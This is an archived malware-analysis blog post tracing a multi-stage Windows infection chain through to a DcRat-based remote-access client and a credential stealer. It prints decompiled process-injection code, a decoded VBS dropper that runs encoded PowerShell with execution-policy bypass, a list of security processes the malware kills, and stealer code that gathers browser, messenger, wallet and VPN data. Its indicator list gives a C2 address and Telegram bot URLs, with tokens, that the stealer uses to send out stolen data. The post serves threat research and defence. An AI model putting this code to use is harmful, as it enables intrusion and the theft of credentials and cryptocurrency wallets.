{
	"id": "a65dce47-7c85-4020-8fd0-32a43a08d6e8",
	"created_at": "2026-04-06T00:11:14.311821Z",
	"updated_at": "2026-04-10T03:24:30.003563Z",
	"deleted_at": null,
	"sha1_hash": "b1acd4e6750b34fe786b59c53cdfc2aa84f209d2",
	"title": "[QuickNote] Uncovering Suspected Malware Distributed By Individuals from Vietnam",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1933059,
	"plain_text": "[QuickNote] Uncovering Suspected Malware Distributed By\r\nIndividuals from Vietnam\r\nPublished: 2023-04-08 · Archived: 2026-04-05 20:31:24 UTC\r\n1 Votes\r\nRecently, I received a hash of sample from a friend on Twitter. Upon further investigation, I noticed that the code\r\nwas likely created by someone in Vietnam. As a result, I decided to analyze and share it with others.\r\nMalicious code can be incredibly dangerous and harmful to computer systems, and it’s important to be able to\r\nrecognize and understand it. By analyzing the code, we can determine its purpose and potential impact, as well as\r\ndevelop strategies to protect against similar threats in the future.\r\nGiven the potential risks of this particular code, I felt it was important to share my findings with others in the\r\nsecurity community. By working together and sharing information, we can all help to keep our systems and\r\nnetworks safe from harm. I hope that someone will take the time to investigate deeper and uncover who is behind\r\nthis malware. It is crucial to identify the culprit and hold them accountable for their actions.\r\nSample hash: 15940f1c8f7e5e79a78c8fad9dc54a8cb9b399d60fb80f6dec2f25870d64dcc1\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 1 of 22\n\nThrough VT’s Telemetry, this sample was submitted from Vietnam. It’s possible that the victim submitted it to VT\r\nor the author themselves submitted it to see if it would be detected by antivirus companies.\r\nBelow is a diagram illustrating the execution flow of the malware.\r\n1. Stage 1\r\nThe compressed file named “ fvia.zip ” contains a shortcut file called “ fvia.lnk “. If the user double-clicks on\r\nthis file, it will execute a Powershell script. This script is designed to download a payload from the address\r\n“ hxxps[://]raw[.]githubusercontent[.]com/vltpro/FVIATOOL/main/iXPWQcqYZM[.]exe ” and save it as\r\n“ %APPDATA%\\svchost.exe “. Finally, the downloaded payload will be executed.\r\n2. Stage 2\r\nThe downloaded file is a .NET payload. Upon a quick inspection of its information, several indicators are present,\r\nsuch as:\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 2 of 22\n\nUpon analyzing the code of this payload, it has been determined that it will decrypt into two PE files. The first PE\r\nfile is a .NET payload, while the second PE file is coded in C. After obtaining information about the method\r\nwithin the decoded .NET payload, it can call this method with two parameters: {\r\n\"C:\\Windows\\System32\\schtasks.exe\", obj2 } . Here, obj2 refers to the second PE file.\r\nQuickly check the basic information of these payloads as the following: 1st payload (.Net payload)\r\n( a1cc33df5af690050e7e76ca40668f68ea0801df2569ac7404762f101a065bb6 )\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 3 of 22\n\n2\r\nnd\r\n payload ( 7c82507412b690ba888f06d3fb9b2d110e2a346da3322de9468bf46ee7086e93 )\r\n3. Stage 3\r\nAfter performing deobfuscation and field renaming, the .NET payload code simply utilizes the Process Injection\r\ntechnique. It spawns the schtasks.exe process and injects Payload 2 into this process, hiding the malicious code\r\nunder the guise of the schtasks.exe process to deceive the victim.\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 4 of 22\n\npublic static void NhXNBbtWQXBcChtcTXUAqcqPi(string path, byte[] BMzkoPmmQXLGAmGCzcVuwiJWE)\r\n{\r\nfor (int i = 0; i \u003c 5; i++)\r\n{\r\nint num = 0;\r\nnQQijGzABIgLBOLrpHqHkkoiD.Struct1 @struct = default(nQQijGzABIgLBOLrp\r\nnQQijGzABIgLBOLrpHqHkkoiD.Struct0 struct2 = default(nQQijGzABIgLBOLrp\r\n@struct.uint_0 = Convert.ToUInt32(Marshal.SizeOf(typeof(nQQijGzABIgLB\r\ntry\r\n{\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_CreateProcessA(path, string\r\n{\r\nthrow new Exception();\r\n}\r\nint num2 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, 60\r\nint num3 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, nu\r\nint[] array = new int[179];\r\narray[0] = 65538;\r\nif (IntPtr.Size == 4)\r\n{\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_GetThreadContext(st\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nelse if (!nQQijGzABIgLBOLrpHqHkkoiD.fn_Wow64GetTheadContext(s\r\n{\r\nthrow new Exception();\r\n}\r\nint num4 = array[41];\r\nint num5 = 0;\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_ReadProcessMemory(struct2.i\r\n{\r\nthrow new Exception();\r\n}\r\nif (num3 == num5 \u0026\u0026 nQQijGzABIgLBOLrpHqHkkoiD.fn_ZwUnmapViewO\r\n{\r\nthrow new Exception();\r\n}\r\nint num6 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, nu\r\nint num7 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, nu\r\nbool flag = false;\r\nint num8 = nQQijGzABIgLBOLrpHqHkkoiD.fn_VirtualAllocEx(struct\r\nif (num8 == 0)\r\n{\r\nthrow new Exception();\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 5 of 22\n\n}\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_WriteProcessMemory(struct2\r\n{\r\nthrow new Exception();\r\n}\r\nint num9 = num2 + 248;\r\nshort num10 = BitConverter.ToInt16(BMzkoPmmQXLGAmGCzcVuwiJWE\r\nfor (int j = 0; j \u003c (int)num10; j++)\r\n{\r\nint num11 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVu\r\nint num12 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVu\r\nint num13 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVu\r\nif (num12 != 0)\r\n{\r\nbyte[] array2 = new byte[num12];\r\nBuffer.BlockCopy(BMzkoPmmQXLGAmGCzcVuwiJWE, n\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_WriteProces\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nnum9 += 40;\r\n}\r\nbyte[] bytes = BitConverter.GetBytes(num8);\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_WriteProcessMemory(struct2\r\n{\r\nthrow new Exception();\r\n}\r\nint num14 = BitConverter.ToInt32(BMzkoPmmQXLGAmGCzcVuwiJWE, n\r\nif (flag)\r\n{\r\nnum8 = num3;\r\n}\r\narray[44] = num8 + num14;\r\nif (IntPtr.Size == 4)\r\n{\r\nif (!nQQijGzABIgLBOLrpHqHkkoiD.fn_SetTheadContext(st\r\n{\r\nthrow new Exception();\r\n}\r\n}\r\nelse if (!nQQijGzABIgLBOLrpHqHkkoiD.fn_Wow64SetTheadContext(s\r\n{\r\nthrow new Exception();\r\n}\r\nif (nQQijGzABIgLBOLrpHqHkkoiD.fn_ResumeThread(struct2.intptr_\r\n{\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 6 of 22\n\nthrow new Exception();\r\n}\r\nbreak;\r\n}\r\ncatch\r\n{\r\nProcess.GetProcessById(Convert.ToInt32(struct2.uint_0)).Kill\r\n}\r\n}\r\n}\r\nUsing IDA to analyze payload 2, we quickly found the function that performs the main task of the malware as\r\nfollows:\r\nDecrypt strings.\r\nWriting the decrypted content of the script into a file and executing that file.\r\nint __stdcall mw_decrypt_and_exec_vbs_file()\r\n{\r\n // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-\"+\" TO EXPAND]\r\n sleep(0);\r\n lpOperation = mw_decrypt_string(encString, 4);\r\n lpFile = mw_decrypt_string(byte_402026, 0xA);\r\n v0 = mw_decrypt_string(byte_402031, 0x12E);\r\n ShellExecuteA(0, lpOperation, lpFile, v0, 0, 0);\r\n encString_arr[0] = \u0026byte_402160;\r\n encString_arr[1] = \u0026byte_40216C;\r\n encString_arr[2] = \u0026byte_402178;\r\n encString_arr[3] = \u0026byte_41240D;\r\n encString_arr[4] = \u0026byte_412415;\r\n encString_arr[5] = \u0026byte_412421;\r\n encString_len[0] = 0xB;\r\n encString_len[1] = 0xB;\r\n encString_len[2] = 0x10294;\r\n encString_len[3] = 1;\r\n encString_len[4] = 7;\r\n encString_len[5] = 0xB;\r\n encString_len[6] = 0x10294;\r\n encString_len[7] = 1;\r\n for ( i = 0; i \u003c 2; ++i )\r\n {\r\n if ( !strcmp(encString_arr[3 * i], g_str_pattern) )\r\n {\r\n v1 = mw_decrypt_string(encString_arr[3 * i + 1], encString_len[4 * i + 1]);\r\n strcpy(vbs_file_full_path, v1);\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 7 of 22\n\n}\r\n else\r\n {\r\n str_special_folder_name = mw_decrypt_string(encString_arr[3 * i], encString_len[4 * i]);\r\n special_folder_path = getenv(str_special_folder_name);\r\n file_name = mw_decrypt_string(encString_arr[3 * i + 1], encString_len[4 * i + 1]);\r\n sprintf(vbs_file_full_path, \"%s\\\\%s\", special_folder_path, file_name);\r\n }\r\n fp = fopen(vbs_file_full_path, \"wb\");\r\n decrypted_file_content = mw_decrypt_string(encString_arr[3 * i + 2], encString_len[4 * i + 2]);\r\n fwrite(decrypted_file_content, encString_len[4 * i + 2], 1u, fp);\r\n fclose(fp);\r\n if ( encString_len[4 * i + 3] )\r\n {\r\n lpOperation = mw_decrypt_string(byte_4226D1, 4);\r\n ShellExecuteA(0, lpOperation, vbs_file_full_path, 0, 0, 0xA);\r\n }\r\n }\r\n return 0;\r\n}\r\nThe pseudocode of the string decryption function is shown below.\r\nBased on this decryption code, we can write an IDApython script to automatically decrypt strings. The result of\r\nexecuting the script is as follows:\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 8 of 22\n\nBelow is a list of all the decoded strings:\r\nTrying to decode string at address 4010B0\r\nEncoded string: b'A+\\x0b\\x02'\r\nDecoded string: open\r\n------------------------------\r\nTrying to decode string at address 4010C7\r\nEncoded string: b'^4\\x19\\t\\x04RQ\\x17\\x0fP'\r\nDecoded string: powershell\r\n------------------------------\r\nTrying to decode string at address 4010DE\r\nEncoded string: b'\\x03\\x1e\\x00\\x0f\\x19E\\\\\\x16 S\\x08Z\\x13W\\x14QR#\\x1a-W\\x1ea\\ri\\nP\\x1d\\x1b-\\x1d:o\\x0b\\\r\nDecoded string: -EncodedCommand \"PAAjAGgAbgBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAj\r\n------------------------------\r\nTrying to decode string at address 40122E\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 401272\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 4012B3\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 40131D\r\nCan not retrieve address of encrypted string!\r\n------------------------------\r\nTrying to decode string at address 401386\r\nEncoded string: b'A+\\x0b\\x02'\r\nDecoded string: open\r\n------------------------------\r\n************************\r\nTotal decoding calls: 8\r\nSuccessful decoding calls: 4\r\n----Decode strings at the above unreachable addresses----\r\nDecode string at address 402160\r\nDecoded string: UserProfile\r\nDecode string at address 40216C\r\nDecoded string: svchost.vbs\r\nDecode string at address 402178\r\nDecoded string: On Error Resume Next\r\n'Dim suXjung\r\n'suXjung = MsgBox (\"\", , \"\")\r\nFor x = 0 To 5\r\n WScript.Sleep(1000)\r\n Next\r\nAzwe25wgvn5g0=\"==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 9 of 22\n\nAzwe25wgvn5g16214=\"gSAQEAJBQSAYEADBwZAYFAPBwKA0GAhBQWAIDA1BAdAgEArAgVAADAFBAOAUGAwBQcAcHACBwbAYHAUBAd\r\nAzwe25wgvn5g32428=\"sAwmBMOBsDwiBMuAXCwkBAeBjAwoBMMByDwmBMMBsDwiBMsAXCwkBAsAXCwkBAqAXCwkBAoAXCwkBAmAXC\r\nAzwe25wgvn5g48642=\"AAJtnAAAAAmhDAAAgWAAAAJBAAAgDAAAwaAAAARAAAAUAAAAgIAAAAHUUWaYgCEAAAKtnARAAAiAAAAkJA\r\nAlsddeyb1xim = Azwe25wgvn5g0 + Azwe25wgvn5g16214 + Azwe25wgvn5g32428 + Azwe25wgvn5g48642\r\nSet obj = CreateObject(\"Wscript.Shell\")\r\nSet fso=CreateObject(\"Scripting.FileSystemObject\")\r\n' startPath = obj.SpecialFolders(\"Startup\") \u0026 \"\\Payload.vbs\"\r\n' currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)\r\nReg = \"HKCU\\SOFTWARE\\Payload\\Payload\"\r\nif obj.RegRead(Reg) \u003c\u003e Alsddeyb1xim then\r\nobj.RegWrite Reg, Alsddeyb1xim\r\nend if\r\nPPSS = \"Powershell -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AG\r\n'PSPS = \"Powershell -exec bypass -window 1 #startup\"\r\nobj.Run PSPS, 0, False\r\nobj.Run PPSS, 0, False\r\nDecode string at address 41240D\r\nDecoded string: AppData\r\nDecode string at address 412415\r\nDecoded string: svchost.vbs\r\nDecode string at address 412421\r\nDecoded string: On Error Resume Next\r\n'Dim suXjung\r\n'suXjung = MsgBox (\"\", , \"\")\r\nFor x = 0 To 5\r\n WScript.Sleep(1000)\r\n Next\r\nAzwe25wgvn5g0=\"==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAzwe25wgvn5g16214=\"gSAQEAJBQSAYEADBwZAYFAPBwKA0GAhBQWAIDA1BAdAgEArAgVAADAFBAOAUGAwBQcAcHACBwbAYHAUBAd\r\nAzwe25wgvn5g32428=\"sAwmBMOBsDwiBMuAXCwkBAeBjAwoBMMByDwmBMMBsDwiBMsAXCwkBAsAXCwkBAqAXCwkBAoAXCwkBAmAXC\r\nAzwe25wgvn5g48642=\"AAJtnAAAAAmhDAAAgWAAAAJBAAAgDAAAwaAAAARAAAAUAAAAgIAAAAHUUWaYgCEAAAKtnARAAAiAAAAkJA\r\nAlsddeyb1xim = Azwe25wgvn5g0 + Azwe25wgvn5g16214 + Azwe25wgvn5g32428 + Azwe25wgvn5g48642\r\nSet obj = CreateObject(\"Wscript.Shell\")\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 10 of 22\n\nSet fso=CreateObject(\"Scripting.FileSystemObject\")\r\n' startPath = obj.SpecialFolders(\"Startup\") \u0026 \"\\Payload.vbs\"\r\n' currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)\r\nReg = \"HKCU\\SOFTWARE\\Payload\\Payload\"\r\nif obj.RegRead(Reg) \u003c\u003e Alsddeyb1xim then\r\nobj.RegWrite Reg, Alsddeyb1xim\r\nend if\r\nPPSS = \"Powershell -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AG\r\n'PSPS = \"Powershell -exec bypass -window 1 #startup\"\r\nobj.Run PSPS, 0, False\r\nobj.Run PPSS, 0, False\r\nDone!!!\r\n4. Stage 4\r\nThe svchost.vbs script performs some actions. Upon analysis, it was discovered that this script is designed to\r\nsave an encoded payload in Base64 format into the registry key “ HKCU\\SOFTWARE\\Payload\\Payload “.\r\nAfter saving the payload in the registry, the script then uses a PowerShell script to read the payload from the\r\nregistry key mentioned above. The PowerShell script decodes the payload using Base64 and executes it.\r\nBased on the PowerShell code snippet above, it can be seen that this payload is a continuation of a .NET payload.\r\n5. Stage 5\r\nThe final payload has an InternalName: Client.exe , and operates as a client, connecting to C2 to download and\r\nexecute the payload that has been downloaded. Its basic tasks are described below, and the corresponding\r\nfunctions will be performed based on the decryption configuration.\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 11 of 22\n\nIn order to execute its malicious actions, the malware needs to decode its configuration information. Based\r\non the information from Client.Settings.Server_Certificate {CN=DcRat [Issuer] C=CN, L=SH,\r\nO=DcRat By qwqdanchun, OU=qwqdanchun..} , it is likely that this payload is based on the source code of\r\nhxxps://github[.]com/qwqdanchun/DcRat.\r\nOnce this is done, the malware will perform simple check to ensure that it is not running on a virtual\r\nmachine. It does this by checking the computer’s cache memory, and if no cache memory is detected, it\r\nwill terminate the process immediately, assuming that it is running on a virtual machine.\r\nTo ensure that only one instance of the malware is executed, a Mutex is created.\r\nAdditionally, the AntiProcess function is called to scan all running processes on the system and\r\nterminate any process that matches a list of predetermined names.\r\nTaskmgr.exe\r\nProcessHacker.exe\r\nprocexp.exe\r\nMSASCui.exe\r\nMsMpEng.exe\r\nMpUXSrv.exe\r\nMpCmdRun.exe\r\nNisSrv.exe\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 12 of 22\n\nUserAccountControlSettings.exe\r\ntaskkill.exe\r\nTo ensure persistence, the malware installs itself by setting up a Run key or Scheduler task.\r\nIt also bypasses the AMSI (Anti-Malware Scan Interface) to avoid detection by antivirus software.\r\nThe malware establishes a connection to the pastebin website ( hxxps://pastebin[.]com/raw/gdYYU7gi )\r\nto obtain the IP address and port number of the C2 (Command and Control) server. It then initiates a\r\nconnection to the C2 server at the specified IP address and port ( 171[.]247.25.94:5656 ).\r\nIf the connection to the C2 server is successful, the malware will authenticate itself as a client and begin\r\ncollecting information about the victim’s computer to send to the C2 server. The malware will then\r\ndownload additional payloads from the C2 server to carry out further malicious actions.\r\nAt the time of analysis, the C2 address is no longer connected, so the analysis will stop at this point.\r\nI spent time quickly examining another file that was also introduced and provided by the threat actor on GitHub:\r\nhxxps://github[.]com/vltpro/FVIATOOL/blob/main/fvia.rar . This compressed file contains two executable\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 13 of 22\n\nfiles. After extracting them, I ran the update.exe file. Its execution process will perform PowerShell scripts\r\nwith two purposes. The first is to display an error message form with an OK button, and the second is to add some\r\npaths (“ $env:UserProfile “ và “ $env:SystemDrive “) to Windows Defender’s exclusion list. This will allow\r\nfiles within these paths to avoid being scanned by the Windows Defender antivirus software, enabling attackers to\r\nperform malicious activities stealthily without being detected. The update.exe process will then decode, drop\r\ntwo files %LocalAppData%\\File1.exe and %AppData%\\ok.exe , and execute them.\r\nQuickly examine the code of the file ok.exe\r\n( 80b231aeb2e6026767e6edd22fa0b073bd805f59aa6eaed5635976a46c10e3cd ). The payload code is similar to the\r\npayload analyzed in Stage 5 above. It also connects to “ hxxps[://]pastebin[.]com/raw/gdYYU7gi ” to retrieve\r\nthe C2 address, however, the information of the Client.Settings.Server_Certificate has been partially\r\nremoved, including some important information.\r\nContinuing on, upon a quick analysis of the code for File1.exe\r\n( ddf0e4ffcdcf120d591a1ea82e58f21936d763f90dc3b33a4c4750fd1496652a ), I noticed that it bears a strong\r\nresemblance to the AsyncRAT malware (for example, the name of the Mutex and the structure of the decoded\r\nconfiguration). However, based on information from the Certificate ({[Subject] CN=WorldWind Stealer\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 14 of 22\n\n[Issuer]\r\nCN=WorldWind Stealer..} it is possible that it is hxxps://github[.]com/Leecher21/WorldWind-Stealer .\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 15 of 22\n\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 16 of 22\n\nOr it is possible that this payload is based on the code from “ hxxps://github[.]com/LimerBoy/StormKitty “\r\nThere are various methods to collect information from a victim’s computer, depending on the situation and the\r\ntype of data needed. The following is the method that this malware uses to collect information on the victim’s\r\nmachine:\r\npublic static bool smethod_0(string string_0)\r\n{\r\ntry\r\n{\r\nClass19.smethod_4(string_0 + \"\\\\Grabber\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass47.smethod_0(string_0 + \"\\\\Browsers\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass41.smethod_0(string_0 + \"\\\\Browsers\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass35.smethod_0(string_0 + \"\\\\Browsers\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass24.smethod_0(Class24.smethod_3(), string_0 + \"\\\\Messenger\\\\Disco\r\n}\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 17 of 22\n\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass25.smethod_0(string_0 + \"\\\\Messenger\\\\Pidgin\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass26.smethod_1(string_0 + \"\\\\Messenger\\\\Telegram\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass28.smethod_0(string_0 + \"\\\\Gaming\\\\Steam\");\r\nClass29.smethod_0(string_0 + \"\\\\Gaming\\\\Uplay\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass27.smethod_5(string_0 + \"\\\\Gaming\\\\Minecraft\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass12.smethod_0(string_0 + \"\\\\Wallets\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass11.smethod_3(Class11.smethod_1(), string_0 + \"\\\\FileZilla\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 18 of 22\n\n{\r\nClass15.smethod_0(string_0 + \"\\\\VPN\\\\ProtonVPN\");\r\nClass14.smethod_0(string_0 + \"\\\\VPN\\\\OpenVPN\");\r\nClass13.smethod_1(string_0 + \"\\\\VPN\\\\NordVPN\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nDirectory.CreateDirectory(string_0 + \"\\\\Directories\");\r\nClass18.smethod_2(string_0 + \"\\\\Directories\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nDirectory.CreateDirectory(string_0 + \"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass21.smethod_0(string_0 + \"\\\\System\");\r\nClass16.smethod_0(string_0 + \"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass17.smethod_0(string_0 + \"\\\\System\");\r\nClass22.smethod_1(string_0 + \"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\ntry\r\n{\r\nClass23.smethod_3(string_0 + \"\\\\System\");\r\nClass23.smethod_2(string_0 + \"\\\\System\");\r\n}\r\ncatch\r\n{\r\n}\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 19 of 22\n\ntry\r\n{\r\nFile.WriteAllText(string_0 + \"\\\\System\\\\ProductKey.txt\", GClass12.sme\r\n}\r\ncatch\r\n{\r\n}\r\nreturn true;\r\n}\r\nOnce the malware has collected this information, it sends it to the attacker’s Telegram account for further\r\nexploitation:\r\nBonus VT Graph:\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 20 of 22\n\nIOCs:\r\n15940f1c8f7e5e79a78c8fad9dc54a8cb9b399d60fb80f6dec2f25870d64dcc1 (zip file)\r\n0603640f8628b4b4c8691204d833bc0b6f8f193049c5e35dc1d556376f4c1b8f (lnk file)\r\n78a627930b04c6ff9bb4a0b5841c4c79bedee168522862e750f5608b43b907ce (payload)\r\n972c14a244a43f498c153ae36495c51c4990f32512650dc870fe5ab6257ad2ad (vbs file)\r\nhxxps[://]raw[.]githubusercontent[.]com/vltpro/FVIATOOL/main/iXPWQcqYZM[.]exe\r\nhxxps[://]pastebin[.]com/raw/gdYYU7gi\r\n171[.]247.25.94:5656\r\nhxxps[://]volamtuan[.]com/hd[.]lnk\r\nhxxps[://]raw[.]githubusercontent[.]com/vltpro/FVIATOOL/main/FVIATOOL[.]exe\r\nhxxps[://]github[.]com/vltpro/FVIATOOL/blob/main/cookie[.]exe\r\nhxxps[://]api[.]telegram[.]org/bot5370417334:AAEZrEauqhTNZInhZ9_-SaapQJIi0hIvjJU/sendDocument?\r\nchat_id=857408205\r\nhxxps[://]api[.]telegram[.]org/bot1119746739:AAGMhvpUjXI4CzIfizRC–VXilxnkJlhaf8/send\r\nhxxps[://]api[.]telegram[.]org/bot5418167780:AAG6XcSYhQ7qknQ8Cj1YipvMX213kbiDV7s/sendMessage?\r\nchat_id=5268900600\r\nvolamtuan[.]com\r\nEnd.\r\nm4n0w4r\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 21 of 22\n\nSource: https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nhttps://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/"
	],
	"report_names": [
		"quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434274,
	"ts_updated_at": 1775791470,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b1acd4e6750b34fe786b59c53cdfc2aa84f209d2.pdf",
		"text": "https://archive.orkl.eu/b1acd4e6750b34fe786b59c53cdfc2aa84f209d2.txt",
		"img": "https://archive.orkl.eu/b1acd4e6750b34fe786b59c53cdfc2aa84f209d2.jpg"
	}
}